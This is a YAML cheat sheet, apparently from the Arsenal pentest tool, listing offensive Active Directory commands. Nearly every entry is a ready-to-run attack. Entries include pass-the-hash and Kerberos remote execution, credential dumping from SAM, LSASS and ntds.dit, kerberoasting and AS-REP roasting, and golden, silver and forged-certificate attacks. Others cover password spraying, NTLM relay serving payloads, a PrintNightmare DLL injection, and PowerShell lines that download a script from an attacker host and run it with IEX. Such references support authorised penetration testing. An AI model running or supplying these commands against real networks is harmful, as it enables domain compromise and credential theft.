3978 lines
156 KiB
YAML
3978 lines
156 KiB
YAML
title: Commands for Fast Memo Shell from Arsenal
|
||
commands:
|
||
- cmd: psexec.py <domain>/<user>:<password>@<ip>
|
||
lang: sh
|
||
tags: impacket, windows, exec
|
||
desc: PSEXEC with username
|
||
- cmd: psexec.py -hashes <hash> <user>@<ip>
|
||
lang: sh
|
||
tags: impacket, windows, exec
|
||
desc: PSEXEC with pass the Hash (pth)
|
||
- cmd: export KRB5CCNAME=<ccache_file>; psexec.py -dc-ip <dc_ip> -target-ip <ip>> -no-pass -k <domain>/<user>@<target_name>
|
||
lang: sh
|
||
tags: impacket, windows, exec
|
||
desc: PSEXEC with kerberos
|
||
- cmd: smbexec.py <domain>/<user>:<password>@<ip>
|
||
lang: sh
|
||
tags: impacket, windows, exec
|
||
desc: SMBEXEC with username
|
||
- cmd: smbexec.py -hashes <hash> <user>@<ip>
|
||
lang: sh
|
||
tags: impacket, windows, exec
|
||
desc: SMBEXEC with pass the Hash (pth)
|
||
- cmd: export KRB5CCNAME=<ccache_file>; smbexec.py -dc-ip <dc_ip> -target-ip <ip>> -no-pass -k <domain>/<user>@<target_name>
|
||
lang: sh
|
||
tags: impacket, windows, exec
|
||
desc: SMBEXEC with kerberos
|
||
- cmd: wmiexec.py <domain>/<user>:<password>@<ip>
|
||
lang: sh
|
||
tags: impacket, windows, exec
|
||
desc: wmiexec
|
||
- cmd: wmiexec.py -hashes <hash> <user>@<ip>
|
||
lang: sh
|
||
tags: impacket, windows, exec
|
||
desc: wmiexec with pass the hash (pth)
|
||
- cmd: atexec.py <domain>/<user>:<password>@<ip> "command"
|
||
lang: sh
|
||
tags: impacket, windows, exec
|
||
desc: atexec - execute command view the task scheduler
|
||
- cmd: atexec.py -hashes <hash> <user>@<ip> "command"
|
||
lang: sh
|
||
tags: impacket, windows, exec
|
||
desc: atexec pass the hash (pth)
|
||
- cmd: smbclient.py <domain>/<user>:<password>@<ip>
|
||
lang: sh
|
||
tags: impacket, windows, exec
|
||
desc: smbclient - connect to smb on the target
|
||
- cmd: GetNPUsers.py <domain>/<user> -no-pass -request -format hashcat
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: GetNPUsers without password to get TGT (ASREPRoasting)
|
||
- cmd: GetNPUsers.py -dc-ip <dc_ip> <domain>/ -usersfile <users_file> -format hashcat
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: GetNPUsers - attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ (ASREPRoasting)
|
||
- cmd: GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: GetUSERSPN - find Service Principal Names that are associated with a normal user account (kerberoasting)
|
||
- cmd: goldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>'@<target>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: MS14-068 - goldenPac
|
||
- cmd: ticketer.py -nthash <nthash> -domain-sid <domain_sid> -domain <domain> <user>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: Ticketer - (golden ticket) - generate TGT/TGS tickets into ccache format which can be converted further into kirbi.
|
||
- cmd: ticketer.py -nthash <nthash> -domain-sid <domain_sid> -domain <domain> -spn <SPN> <user>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: Ticketer - (silver ticket) - generate TGS tickets into ccache format which can be converted further into kirbi.
|
||
- cmd: ticketConverter.py <ccache_ticket_file> <ticket_kirbi_file>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: TicketConverter - convert kirbi files (commonly used by mimikatz) into ccache files used by impacket
|
||
- cmd: getST.py -spn cifs/<target> <domain>/<netbios_name>\$ -impersonate <user>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: Silver ticket - impersonate user
|
||
- cmd: getTGT.py -dc-ip <dc_ip> -hashes <lm_hash>:<nt_hash> <domain>/<user>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: GetTGT - request a TGT and save it as ccache for given a password, hash or aesKey
|
||
- cmd: GetADUsers.py -all <domain>/<user>:<password> -dc-ip <dc_ip>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: GetADUser - gather data about the domain’s users and their corresponding email addresses
|
||
- cmd: samrdump.py <domain>/<user>:<password>@<ip>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: samrdump - system account, shares, etc... (dump info from the Security Account Manager (SAM))
|
||
- cmd: secretsdump.py '<domain>/<user>:<password>'@<ip>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: secretsdump
|
||
- cmd: secretsdump.py -system <SYSTEM_FILE|SYSTEM> -sam <SAM_FILE|SAM> LOCAL
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: secretsdump local dump - extract hash from sam database
|
||
- cmd: secretsdump.py -ntds <ntds_file.dit> -system <SYSTEM_FILE> -hashes <lmhash:nthash> LOCAL -outputfile <ntlm-extract-file>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: secretsdump local dump - extract hash from ntds.dit
|
||
- cmd: secretsdump.py <domain>/<dc_bios_name>\$/@<ip> -no-pass -just-dc-user "Administrator"
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: secretsdump - anonymous get administrator
|
||
- cmd: secretsdump.py -just-dc-ntlm -outputfile <ntlm-extract-file> <domain>/<user>:<password>@<ip>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: secretsdump - remote extract
|
||
- cmd: secretsdump.py -just-dc -pwd-last-set -user-status -outputfile <ntlm-extract-file> <domain>/<user>:<password>@<ip>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: secretsdump - remote extract + users infos
|
||
- cmd: smbserver.py <shareName> <sharePath>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: smbserver - share smb folder
|
||
- cmd: smbserver.py -username <username> -password <password> <shareName> <sharePath>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: smbserver - share smb folder with authentication
|
||
- cmd: ntlmrelayx.py -tf <targets_file> -smb2support -e <payload_file|payload.exe>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: ntlmrelay - host a payload that will automatically be served to the remote host connecting
|
||
- cmd: ntlmrelayx.py -tf <targets_file> -socks -smb2support
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: ntlmrelay - socks
|
||
- cmd: ntlmrelayx.py -tf <targets_file> -smb2support
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: ntlmrelay - authenticate and dump hash
|
||
- cmd: ntlmrelayx.py -6 -wh <attacker_ip> -t smb://<target> -l /tmp -socks -debug
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: ntlmrelay - to use with mitm6 - relay to target
|
||
- cmd: ntlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_ip> --delegate-access
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: ntlmrelay - to use with mitm6 - delegate access
|
||
- cmd: lookupsid.py <domain>/<user>:<password>@<ip>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: lookupsid - SID User Enumeration, extract the information about what users exist and their data.
|
||
- cmd: reg.py <domain>/<user>:<password>@<ip> query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: reg - query registry info remotely
|
||
- cmd: rpcdump.py <domain>/<user>:<password>@<ip>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: rpcdump - list rpc endpoint
|
||
- cmd: services.py <domain>/<user>:<password>@<ip> <action>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: services.py - (start, stop, delete, read status, config, list, create and change any service) remote
|
||
- cmd: getArch.py -target <ip>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: getarch - find target architecture (64 or 32 bits)
|
||
- cmd: netview.py <domain>/<user> -target <ip> -users <users_file>
|
||
lang: sh
|
||
tags: impacket, windows, kerberos, 88
|
||
desc: netview - enumeration tool (ip/shares/sessions/logged users) - need dns set
|
||
- cmd: python3 scshell.py -service-name <service-name|defragsvc> -hashes :<ntlm-hash> <domain>/<user>@<ip>
|
||
lang: sh
|
||
tags: SCShell, psexec, sealthy, DCERPC
|
||
desc: stealty psexec
|
||
- cmd: neo4j start
|
||
lang: bash
|
||
tags: bloodhound, Active directory enumeration
|
||
desc: start neo4j server
|
||
- cmd: bloodhound
|
||
lang: bash
|
||
tags: bloodhound, Active directory enumeration
|
||
desc: bloodhound start IHM
|
||
- cmd: bloodhound-python -d <domain> -u <user> -p <password> -c all
|
||
lang: bash
|
||
tags: bloodhound, Active directory enumeration
|
||
desc: bloodhound - collect data
|
||
- cmd: bloodhound-python -d <domain> -u <user> -p <password> -gc <global_catalog> -dc <domain_controler> -c all
|
||
lang: bash
|
||
tags: bloodhound, Active directory enumeration
|
||
desc: bloodhound - collect data (alternative)
|
||
- cmd: import-module sharphound.ps1; invoke-bloodhound -collectionmethod all -domain <domain>
|
||
lang: ps1
|
||
tags: bloodhound, Active directory enumeration
|
||
desc: sharphound - collect bloodhound data
|
||
- cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/SharpHound.ps1') | Invoke-BloodHound -CollectionMethod All -domain <domain>
|
||
lang: ps1
|
||
tags: bloodhound, Active directory enumeration
|
||
desc: sharphound - collect bloodhound data download and execute
|
||
- cmd: cypheroth -u <bh_user|neo4j> -p <bh_password|exegol4thewin> -d <domain>
|
||
lang: bash
|
||
tags: bloodhound, Active directory enumeration
|
||
desc: cypheroth - start
|
||
- cmd: aclpwn -f <computer_name> -ft computer -d <domain> -dry
|
||
lang: sh
|
||
tags: bloodhound, Active directory enumeration
|
||
desc: aclpwn - from computer to domain - dry run
|
||
- cmd: certipy find -u <user>@<domain> -p '<password>' -dc-ip <dc-ip>
|
||
lang: sh
|
||
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
|
||
desc: certipy - list certificate templates
|
||
- cmd: certipy req -u <user>@<domain> -p '<password>' -target <ca-fqdn> -template <template> -ca <certificate-authority>
|
||
lang: sh
|
||
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
|
||
desc: certipy - request certificate
|
||
- cmd: certipy auth -pfx <pfx-file>
|
||
lang: sh
|
||
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
|
||
desc: certipy - authenticate with pfx certificate
|
||
- cmd: certipy auth -pfx <pfx-file> -dc-ip <dc-ip> -ldap-shell
|
||
lang: sh
|
||
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
|
||
desc: certipy - authenticate through LDAP (Schannel) with pfx certificate
|
||
- cmd: certipy ca -u <user>@<domain> -p '<password>' -backup -ca <certificate-authority> -target-ip <ca-ip>
|
||
lang: sh
|
||
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
|
||
desc: certipy - Golden Certificate - steal CA certificate and private key
|
||
- cmd: certipy forge -ca-pfx <pfx-file> -upn <user>@<domain> -crl ldap://<dc-ip>:389
|
||
lang: sh
|
||
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
|
||
desc: certipy - Golden Certificate - forge certificate
|
||
- cmd: certipy req -u <user>@<domain> -p '<password>' -target <ca-fqdn> -template <template> -ca <certificate-authority> -upn <targeted-user>@<domain>
|
||
lang: sh
|
||
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
|
||
desc: certipy - request certificate for another user - ESC1 - ESC6
|
||
- cmd: certipy req -u <user>@<domain> -p '<password>' -target <ca-fqdn> -template <template> -ca <certificate-authority> -on-behalf-of '<NetBIOS-domain-name>\<targeted-user>' -pfx <pfx-file>
|
||
lang: sh
|
||
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
|
||
desc: certipy - request certificate on behalf of with Certificate Request Agent certificate - ESC3
|
||
- cmd: certipy template -u <user>@<domain> -p '<password>' -template <template> -save-old
|
||
lang: sh
|
||
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
|
||
desc: certipy - modify template in order to make it vulnerable to ESC1 - ESC4
|
||
- cmd: certipy ca -u <user>@<domain> -p '<password>' -ca <certificate-authority> -issue-request <csr-id>
|
||
lang: sh
|
||
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
|
||
desc: certipy - Issue certificate for specific request id - ESC7
|
||
- cmd: certipy relay -ca <ca-fqdn>
|
||
lang: sh
|
||
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
|
||
desc: certipy - relay authentication to CA Web Enrollment - ESC8
|
||
- cmd: certipy relay -ca <ca-fqdn> -template 'DomainController'
|
||
lang: sh
|
||
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
|
||
desc: certipy - relay domain controller authentication to CA Web Enrollment - ESC8
|
||
- cmd: certipy account update -u <user>@<domain> -p '<password>' -user <targeted-user> -upn <administrator-user>
|
||
lang: sh
|
||
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
|
||
desc: certipy - Modify user upn to another one - ESC9 - ESC10
|
||
- cmd: certipy shadow auto -u <user>@<domain> -p '<password>' -account <targeted-user>
|
||
lang: sh
|
||
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
|
||
desc: certipy - Get NT hash - Shadow Credential
|
||
- cmd: cme smb <ip>
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - enumerate hosts, network
|
||
- cmd: cme smb <ip> -u <user> -p '<password>' --pass-pol
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - enumerate password policy
|
||
- cmd: cme smb <ip> -u '' -p ''
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - enumerate null session
|
||
- cmd: cme smb <ip> -u 'a' -p ''
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - enumerate anonymous login
|
||
- cmd: cme smb <ip> -u <user> -p '<password>' --sessions
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - enumerate active sessions
|
||
- cmd: cme smb <ip> -u <user> -p '<password>' --users
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - enumerate domain users
|
||
- cmd: cme smb <ip> -u <user> -p '<password>' --rid-brute
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - enumerate users by bruteforce the RID
|
||
- cmd: cme smb <ip> -u <user> -p '<password>' --groups
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - enumerate domain groups
|
||
- cmd: cme smb <ip> -u <user> -p '<password>' --local-groups
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - enumerate local groups
|
||
- cmd: cme smb <ip> -u <user> -p <password> -d <domain> --shares
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - enumerate shares
|
||
- cmd: cme smb <ip> -u <user> -p '<password>' --disks
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - enumerate disks
|
||
- cmd: cme smb <ip> --gen-relay-list smb_targets.txt
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - enumerate smb target not signed
|
||
- cmd: cme smb <ip> -u <user> -p '<password>' --loggedon-users
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - enumerate logged users
|
||
- cmd: cme smb <ip> -u <user|Administrator> -p '<password>' --local-auth --wdigest enable
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - enable wdigest
|
||
- cmd: cme smb <ip> -u <user> -p '<password>' -x 'quser'; cme smb <ip> -u <user> -p '<password>' -x 'logoff <id_user>' --no-output
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - loggout user
|
||
- cmd: cme smb <ip> -u <user> -p <password> --local-auth
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - local-auth
|
||
- cmd: cme smb <ip> -u <user> -H <hash> --local-auth
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - local-auth with hash
|
||
- cmd: cme smb <ip> -u <user> -p <password> -d <domain>
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - domain auth
|
||
- cmd: cme smb <ip> --kerberos
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - kerberos auth
|
||
- cmd: cme smb <ip> -u <user> -p <password> -d <domain> --sam
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - Dump SAM
|
||
- cmd: cme smb <ip> -u <user> -p <password> -d <domain> --lsa
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - Dump LSA
|
||
- cmd: cme smb <ip> -u <user> -p <password> -d <domain> --ntds
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - dump ntds.dit
|
||
- cmd: cme smb <ip> -u <user> -p <password> -d <domain> -M lsassy
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - dump lsass
|
||
- cmd: cme smb <ip> --local-auth -u <user> -H <hash> -M lsassy -o BLOODHOUND=True NEO4JUSER=<user|neo4j> NEO4JPASS=<neo4jpass|exegol4thewin>
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - dump lsass - with bloodhond update
|
||
- cmd: cme smb <dc-ip> -u <user.txt> -p <password.txt> --no-bruteforce --continue-on-success
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - password spray (user=password)
|
||
- cmd: cme smb <dc-ip> -u <user.txt> -p <password.txt> --continue-on-success
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - password spray multiple test
|
||
- cmd: cme smb <ip> -u <user> -p <password> --put-file <local_file> <remote_path|\\Windows\\Temp\\target.txt>
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - put file
|
||
- cmd: cme smb <ip> -u <user> -p <password> --get-file <remote_path|\\Windows\\Temp\\target.txt> <local_file>
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - get file
|
||
- cmd: cme ldap <ip> -u <user> -p '' --asreproast ASREProastables.txt --kdcHost <dc_ip>
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - ASREPRoast enum without authentication
|
||
- cmd: cme ldap <ip> -u <user> -p '<password>' --asreproast ASREProastables.txt --kdcHost <dc_ip>
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - ASREPRoast enum with authentication
|
||
- cmd: cme ldap <ip> -u <user> -p '<password>' --kerberoasting kerberoastables.txt --kdcHost <dc_ip>
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - Kerberoasting
|
||
- cmd: cme ldap <ip> -u <user> -p '<password>' --trusted-for-delegation
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - Unconstrained delegation
|
||
- cmd: cme winrm <ip> -u <user> -p <password>
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - winrm-auth
|
||
- cmd: cme mssql <ip> -u <user.txt> -p <password.txt> --no-bruteforce
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - mssql password spray
|
||
- cmd: cme mssql <ip> -u <user> -p '<password>' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases; '
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - mssql execute query
|
||
- cmd: cme mssql <ip> -u <user> -p '<password>' --local-auth -x <cmd|whoami>
|
||
lang: bash
|
||
tags: cme, crackmapexec, windows, Active directory
|
||
desc: cme - mssql execute command
|
||
- cmd: coercer.py -d '<domain>' -u '<user>' -p '<password>' --listener <hackerIp> <targetIp>
|
||
lang: sh
|
||
tags: adcs, certificate, windows, Active directory, template
|
||
desc: coercer - list vulns
|
||
- cmd: coercer.py -d '<domain>' -u '<user>' -p '<password>' --webdav-host '<ResponderMachineName>' <targetIp>
|
||
lang: sh
|
||
tags: adcs, certificate, windows, Active directory, template
|
||
desc: coercer - Webdav
|
||
- cmd: coercer.py -d '<domain>' -u '<user>' -p '<password>' --listener <hackerIp> --targets-file <PathToTargetFile>
|
||
lang: sh
|
||
tags: adcs, certificate, windows, Active directory, template
|
||
desc: coercer - List vulns many targets
|
||
- cmd: ./kerbrute_linux_amd64 userenum -d <domain> --dc <ip> <users_file>
|
||
lang: sh
|
||
tags: kerberos
|
||
desc: Kerbrute usersenum
|
||
- cmd: nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>'" <ip>
|
||
lang: sh
|
||
tags: kerberos
|
||
desc: kerberos enum users
|
||
- cmd: nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=<users_list_file>" <ip>
|
||
lang: sh
|
||
tags: kerberos
|
||
desc: kerberos enum users (with user list)
|
||
- cmd: msfconsole -x "use auxiliary/admin/kerberos/ms14_068_kerberos_checksum"
|
||
lang: sh
|
||
tags: kerberos
|
||
desc: kerberos ms14-068
|
||
- cmd: msfconsole -x "use scanner/smb/smb_enum_gpp"
|
||
lang: sh
|
||
tags: kerberos
|
||
desc: exploit gpp - group policy preference (ms14-025)
|
||
- cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/GetUserSPNs.ps1') | IEX
|
||
lang: ps1
|
||
tags: kerberos
|
||
desc: powershell - get user SPN
|
||
- cmd: Get-LAPSPasswords -DomainController <ip_dc> -Credential <domain>\<login> | Format-Table -AutoSize
|
||
lang: sh
|
||
tags: laps, password
|
||
desc: get laps passwords
|
||
- cmd: Import-Module .\LAPSToolkit.ps1; Get-LAPSComputers
|
||
lang: ps1
|
||
tags: laps, password
|
||
desc: get laps computer list
|
||
- cmd: Import-Module .\LAPSToolkit.ps1; Find-LAPSDelegatedGroups
|
||
lang: ps1
|
||
tags: laps, password
|
||
desc: find the list of group who can manipulate SAM data
|
||
- cmd: Get-DomainObject <computer> -Properties "ms-mcs-AdmPwd",name
|
||
lang: ps1
|
||
tags: laps, password
|
||
desc: powerview get laps password
|
||
- cmd: use windows/gather/credentials/enum_laps
|
||
lang: sh
|
||
tags: laps, password
|
||
desc: metasploit get laps password
|
||
- cmd: foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
|
||
lang: sh
|
||
tags: laps, password
|
||
desc: get all machine passwords
|
||
- cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/LAPSToolkit.ps1') | IEX; Import-Module .\LAPSToolkit.ps1
|
||
lang: ps1
|
||
tags: laps, password
|
||
desc: laps toolkit
|
||
- cmd: Import-Module .\LAPSToolkit.ps1; Get-LAPSComputers
|
||
lang: ps1
|
||
tags: laps, password
|
||
desc: laps toolkit - Get laps computer
|
||
- cmd: Import-Module .\LAPSToolkit.ps1; Find-LAPSDelegatedGroups
|
||
lang: ps1
|
||
tags: laps, password
|
||
desc: laps toolkit - find LAPS Delegated Groups
|
||
- cmd: Import-Module .\LAPSToolkit.ps1; Find-AdmPwdExtendedRights
|
||
lang: ps1
|
||
tags: laps, password
|
||
desc: laps toolkit - Find users with Extended rights
|
||
- cmd: lsassy -d <domain> -u <user> -p <password> <ip>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Lsassy basic usage with password (ip or range)
|
||
- cmd: lsassy -v -u <user> -H <hash> <ip>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Lsassy basic usage with hash (ip or range)
|
||
- cmd: lsassy -d <domain> -u <user> -k <ip_range>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Lsassy basic usage with kerberos (ip or range)
|
||
- cmd: rpcdump.py <domain>/<user>:'<password>'@<dc> | grep MS-RPRN
|
||
lang: sh
|
||
tags: printerbug, petitpotam, Active directory
|
||
desc: Finding Spooler services listening
|
||
- cmd: rpcdump.py <dc> | grep -A 6 MS-RPRN
|
||
lang: sh
|
||
tags: printerbug, petitpotam, Active directory
|
||
desc: Finding Spooler services anonymous
|
||
- cmd: dementor.py -d <domain> -u <user> -p <password> <attacker_ip> <dc2>
|
||
lang: sh
|
||
tags: printerbug, petitpotam, Active directory
|
||
desc: dementor
|
||
- cmd: printerbug.py '<domain>/<user>:<password>'@<ip> <attacker_ip>
|
||
lang: sh
|
||
tags: printerbug, petitpotam, Active directory
|
||
desc: printerbug
|
||
- cmd: webclientservicescanner '<domain>/<user>:<password>'@<ip_range>
|
||
lang: sh
|
||
tags: printerbug, petitpotam, Active directory
|
||
desc: webclientservicescanner
|
||
- cmd: PetitPotam.py -u <user> -p '<password>' -d <domain> <listener> <target>
|
||
lang: sh
|
||
tags: printerbug, petitpotam, Active directory
|
||
desc: PetitPotam
|
||
- cmd: ntlmrelayx -t ldaps://<dc1> -smb2support --remove-mic --add-computer <computer_name> <computer_password> --delegate-access
|
||
lang: sh
|
||
tags: printerbug, petitpotam, Active directory
|
||
desc: ntlmrelayx add computer
|
||
- cmd: getST.py -spn host/<dc2> -impersonate <user_to_impersonate> -dc-ip <dc1_ip> '<domain>/<computer_name>$:<computer_password>'
|
||
lang: sh
|
||
tags: printerbug, petitpotam, Active directory
|
||
desc: use silver ticket
|
||
- cmd: secretsdump -k <dc>
|
||
lang: sh
|
||
tags: printerbug, petitpotam, Active directory
|
||
desc: secret dump with kerberos
|
||
- cmd: CVE-2021-1675.py <domain>/<user>:<password>@<target_ip> '\\<attacker_ip>\<share_name>\<dll_name|inject>.dll'
|
||
lang: sh
|
||
tags: printerbug, petitpotam, Active directory
|
||
desc: PrintNightmare
|
||
- cmd: PrintSpooferNet.exe \\.\pipe\test\pipe\spoolss <launch_cmd>
|
||
lang: sh
|
||
tags: printerbug, petitpotam, Active directory
|
||
desc: Printspoofer privesc
|
||
- cmd: SpoolSample.exe <target_hostname> <target_hostname>/pipe/test
|
||
lang: sh
|
||
tags: printerbug, petitpotam, Active directory
|
||
desc: Spoolsample launch pipe
|
||
- cmd: SpoolSample.exe <target_server> <capture_server>
|
||
lang: sh
|
||
tags: printerbug, petitpotam, Active directory
|
||
desc: Spoolsample
|
||
- cmd: mitm6 -d <domain>
|
||
lang: sh
|
||
tags: mitm6, ipv6, man in the middle
|
||
desc: run mitm6 (to run with impacket-ntlmrelayx)
|
||
- cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/powerview.ps1') | IEX
|
||
lang: ps1
|
||
tags: ad, windows, powerview
|
||
desc: load from remote
|
||
- cmd: $passwd = ConvertTo-SecureString "<password>" -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential ("<domain>\<user>", $passwd)
|
||
lang: ps1
|
||
tags: ad, windows, powerview
|
||
desc: Set alternative creds to use
|
||
- cmd: ConvertFrom-SID <sid>
|
||
lang: ps1
|
||
tags: ad, windows, powerview
|
||
desc: Get User from SID
|
||
- cmd: Get-ObjectAcl -Identity <user> -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_}
|
||
lang: ps1
|
||
tags: ad, windows, powerview
|
||
desc: Find user ACL
|
||
- cmd: Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
|
||
lang: ps1
|
||
tags: ad, windows, powerview
|
||
desc: Find all domain user ACL
|
||
- cmd: Add-DomainObjectAcl -TargetIdentity <target> -PrincipalIdentity <current_user> -Rights All
|
||
lang: ps1
|
||
tags: ad, windows, powerview
|
||
desc: Add user DACL
|
||
- cmd: Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
|
||
lang: ps1
|
||
tags: ad, windows, powerview
|
||
desc: Find all groups our current user got access
|
||
- cmd: Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
|
||
lang: ps1
|
||
tags: ad, windows, powerview
|
||
desc: Find all users our current user got access
|
||
- cmd: Add-DomainObjectAcl -TargetIdentity <target> -PrincipalIdentity <user> -Rights All
|
||
lang: ps1
|
||
tags: ad, windows, powerview
|
||
desc: Add GenericAll to target for user
|
||
- cmd: Get-DomainComputer -Unconstrained
|
||
lang: ps1
|
||
tags: ad, windows, powerview
|
||
desc: Find all Computer with unconstrained delegation
|
||
- cmd: Get-DomainTrustMapping
|
